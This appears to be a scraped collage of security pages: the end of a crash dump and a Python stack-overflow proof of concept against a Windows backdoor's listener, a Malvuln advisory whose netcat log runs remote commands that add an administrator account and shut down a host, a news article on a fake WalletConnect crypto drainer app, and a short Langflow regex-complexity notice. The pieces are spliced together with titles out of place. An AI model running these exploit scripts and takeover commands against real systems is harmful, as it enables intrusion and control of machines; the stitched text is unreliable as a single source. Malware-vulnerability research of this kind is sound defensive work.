0019e7b0 72727272 72727272 72727272 72727272 0x72727272  
0019e7b4 72727272 72727272 72727272 72727272 0x72727272  
0019e7b8 72727272 72727272 72727272 72727272 0x72727272  
0019e7bc 72727272 72727272 72727272 72727272 0x72727272  
0019e7c0 72727272 72727272 72727272 72727272 0x72727272  
0019e7c4 72727272 72727272 72727272 72727272 0x72727272  
0019e7c8 72727272 72727272 72727272 72727272 0x72727272  
0019e7cc 72727272 72727272 72727272 72727272 0x72727272  
0019e7d0 72727272 72727272 72727272 72727272 0x72727272  
0019e7d4 72727272 72727272 72727272 72727272 0x72727272  
0019e7d8 72727272 72727272 72727272 72727272 0x72727272  
0019e7dc 72727272 72727272 72727272 72727272 0x72727272  
0019e7e0 72727272 72727272 72727272 72727272 0x72727272  
0019e7e4 72727272 72727272 72727272 72727272 0x72727272  
0019e7e8 72727272 72727272 72727272 72727272 0x72727272  
0019e7ec 72727272 72727272 72727272 72727272 0x72727272  
0019e7f0 72727272 72727272 72727272 72727272 0x72727272  
0019e7f4 72727272 72727272 72727272 72727272 0x72727272  
0019e7f8 72727272 72727272 72727272 72727272 0x72727272  
0019e7fc 72727272 72727272 72727272 72727272 0x72727272  
0019e800 72727272 72727272 72727272 72727272 0x72727272  
0019e804 72727272 72727272 72727272 72727272 0x72727272  
0019e808 72727272 72727272 72727272 72727272 0x72727272  
0019e80c 72727272 72727272 72727272 72727272 0x72727272  
0019e810 72727272 72727272 72727272 72727272 0x72727272  
0019e814 72727272 72727272 72727272 72727272 0x72727272  
0019e818 72727272 72727272 72727272 72727272 0x72727272  
0019e81c 72727272 72727272 72727272 72727272 0x72727272  
0019e820 72727272 72727272 72727272 72727272 0x72727272  
0019e824 72727272 72727272 72727272 72727272 0x72727272  
0019e828 72727272 72727272 72727272 72727272 0x72727272  
0019e82c 72727272 72727272 72727272 72727272 0x72727272  
0019e830 72727272 72727272 72727272 72727272 0x72727272  
0019e834 72727272 72727272 72727272 72727272 0x72727272  
0019e838 72727272 72727272 72727272 72727272 0x72727272  
0019e83c 72727272 72727272 72727272 72727272 0x72727272  
0019e840 72727272 72727272 72727272 72727272 0x72727272  
0019e844 72727272 72727272 72727272 72727272 0x72727272  
0019e848 72727272 72727272 72727272 72727272 0x72727272  
0019e84c 72727272 72727272 72727272 72727272 0x72727272  
0019e850 72727272 72727272 72727272 72727272 0x72727272  
0019e854 72727272 72727272 72727272 72727272 0x72727272  
0019e858 72727272 72727272 72727272 72727272 0x72727272  
0019e85c 72727272 72727272 72727272 72727272 0x72727272  
0019e860 72727272 72727272 72727272 72727272 0x72727272  
0019e864 72727272 72727272 72727272 72727272 0x72727272  
0019e868 72727272 72727272 72727272 72727272 0x72727272  
0019e86c 72727272 72727272 72727272 72727272 0x72727272  
0019e870 72727272 72727272 72727272 72727272 0x72727272  
0019e874 72727272 72727272 72727272 72727272 0x72727272  
0019e878 72727272 72727272 72727272 72727272 0x72727272  
0019e87c 72727272 72727272 72727272 72727272 0x72727272  
0019e97c 76fa665c 0019ea68 001a1758 000007a0 0x72727272  
0019e9e0 76fa01a3 b8e17520 04394df0 04390000 ntdll!RtlpFindUnicodeStringInSection+0x19c  
0019ea14 00000000 00000003 00000000 0000003b ntdll!RtlpFreeHeap+0x723

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088

IMAGE_NAME:  Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  4228698c

STACK_COMMAND:  .cxr 0x19e0ec ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_FILL_PATTERN_72727272_c0000409_Backdoor.Win32.Agent.pw.68dd7df213674e096d6ee255a7b90088.exe!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_72727272_MISSING_GSFRAME_Backdoor_Win32_Agent_pw_68dd7df213674e096d6ee255a7b90088+11515

Followup: MachineOwner  
---------

0:000> !exchain  
0019df50: ntdll!_except_handler4+0 (76fd6a50)  
  CRT scope  0, func:   ntdll!RtlReportExceptionHelper+251 (770157ad)  
0019e8f8: 72727272  
Invalid exception stack at 72727272

Exploit/PoC:  
from socket import *  
import time

MALWARE_HOST="x.x.x.x"  
PORT=21111  

def doit():  
    print("[+] Backdoor.Win32.Agent.pw")  
    print("[+] Remote Stack Buffer Overflow - SEH")  
    print("[+] MD5: 68dd7df213674e096d6ee255a7b90088")

    for i in range(1, 16):  
        s=socket(AF_INET, SOCK_STREAM)  
        s.connect((MALWARE_HOST, PORT))  
        PAYLOAD="r"*512 * i   
        s.send(PAYLOAD.encode())  
        time.sleep(0.3)  
        print(len(PAYLOAD))  
        s.close()

if __name__=="__main__":  
    doit()  
    print("Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Agent.pw MVID-2024-0697 Buffer Overflow

Backdoor.Win32.Boiling malware suffers from a code execution vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/80cb490e5d3c4205434850eff6ef5f8f.txtContact: malvuln13@gmail.comMedia: x.com/malvuln  Threat: Backdoor.Win32.BoilingVulnerability: Unauthenticated Remote Command ExecutionDescription: The malware listens on TCP port 4369. Third party adversaries who can reach an infected host, can issue single OS commands to takeover the system undermining the initial infection.Family: BoilingType: PE32MD5: 80cb490e5d3c4205434850eff6ef5f8fSHA256: cbaefa79eb48d893426d438b48ca0fc6e7f6f4a6810b9c1e76bf625b69a609e1Vuln ID: MVID-2024-0696Disclosure: 09/27/2024Exploit/PoC:nc64.exe x.x.x.x 4369calcOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369net user hyp3rlinx 666 /addOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369net localgroup administrators hyp3rlinx /addOK, Success in Execute Commandúnc64.exe 192.168.18.125 4369ping 8.8.8.8 > out.txtOK, Success in Execute Commandúshutdown -fOK, Success in Execute CommandúDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Boiling MVID-2024-0696 Code Execution

A malicious app disguised as a legitimate WalletConnect tool targeted mobile users on Google Play. The app stole…

A malicious app disguised as a legitimate WalletConnect tool targeted mobile users on Google Play. The app stole crypto assets from unsuspecting victims. Learn how to protect yourself from similar scams.

Check Point Research (CPR) has discovered the first-ever mobile crypto drainer app on Google Play, deceptively posing as the legitimate WalletConnect tool. The app targeted users directly on their mobile devices, stealing around $70,000 from at least 150 victims. This marks the first time a drainer has exclusively targeted mobile device users, using advanced social engineering tactics and sophisticated evasion techniques.

The fake crypto drainer and wallet app (Screenshot: CPR)

This app capitalized on the trusted name “WalletConnect,” a well-known protocol for connecting wallets to Decentralized Applications (dApps). By appearing as a genuine WalletConnect solution, it lured users who were struggling to connect their wallets to Web3 applications using traditional methods into installing it.

Once installed, the app would prompt users to connect their wallets. This seemingly harmless request was a trap. Upon connection, the app would silently activate the MS Drainer, a powerful toolkit designed to steal various crypto assets.

The MS Drainer would then scan the victim’s wallet for valuable assets like tokens and NFTs. It would prioritize stealing the most valuable ones, using clever techniques to minimize fees and avoid detection. The app also employed deceptive tactics to trick users into signing transactions that would grant the attacker permission to withdraw funds.

These transactions appeared legitimate, leading many victims to unknowingly compromise their assets. This process is repeated across multiple blockchain networks, allowing attackers to systematically steal victims’ assets.

The malicious WalletConnect app used advanced social engineering and technical manipulation, exploiting the complexities of the legitimate WalletConnect protocol, to deceive users into thinking it was a safe tool for connecting their cryptocurrency wallets to Web3 applications.

According to Check Point’s detailed technical report shared with Hackread.com ahead of publishing on Thursday, the app also used advanced evasion techniques, such as fake positive reviews, to remain undetected on Google Play’s verification process for nearly five months, causing significant damage. It managed to accumulate over 10,000 downloads and received numerous fake positive reviews, further deceiving potential victims.

Fake reviews (Screenshot: CPR)

This indicates the growing sophistication of cybercriminals in the decentralized finance ecosystem. Crypto drainers, which steal digital assets, are increasingly used by attackers, often using phishing websites and apps that mimic legitimate platforms. This case highlights the importance of user awareness and security in the DeFi space, reminding us yet again that even seemingly legitimate apps can harbour malicious intent.

Commenting on this, Alexander Chailytko, Cyber Security, Research & Innovation Manager at Check Point Software warned Android users to watch out before downloading an app from third-party as well as Google’s very own Google Play or Play Store.

“This incident is a wake-up call for the entire digital asset community as the emergence of the first mobile crypto drainer app on Google Play marks a significant escalation in the tactics used by cybercriminals and the rapidly evolving landscape of cyber threats in decentralized finance,” Alexander explained.

“This research highlights the critical need for advanced, AI-driven security solutions that can detect and prevent such sophisticated threats. Both users and developers must stay informed and take proactive measures to secure their digital assets.”

1.  Trezor Data Breach Exposes Email and Names of 66,000 Users
2.  Pink Drainer Posed as Journalists, Stole $3M from Twitter Users
3.  Hackers Posed as Google Support to Steal $243 Million in Crypto
4.  Apple Approves Fake App Before Real Rabby Wallet, Funds Stolen
5.  Inferno Drainer Phishing Nets Scammers $80M from Crypto Wallets

First Mobile Crypto Drainer on Google Play Steals $70K from Users

A vulnerability classified as problematic was found in Langflow up to 1.0.18. Affected by this vulnerability is an unknown functionality of the file \src\backend\base\langflow\interface\utils.py of the component HTTP POST Request Handler. The manipulation of the argument remaining_text leads to inefficient regular expression complexity. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Tag

#web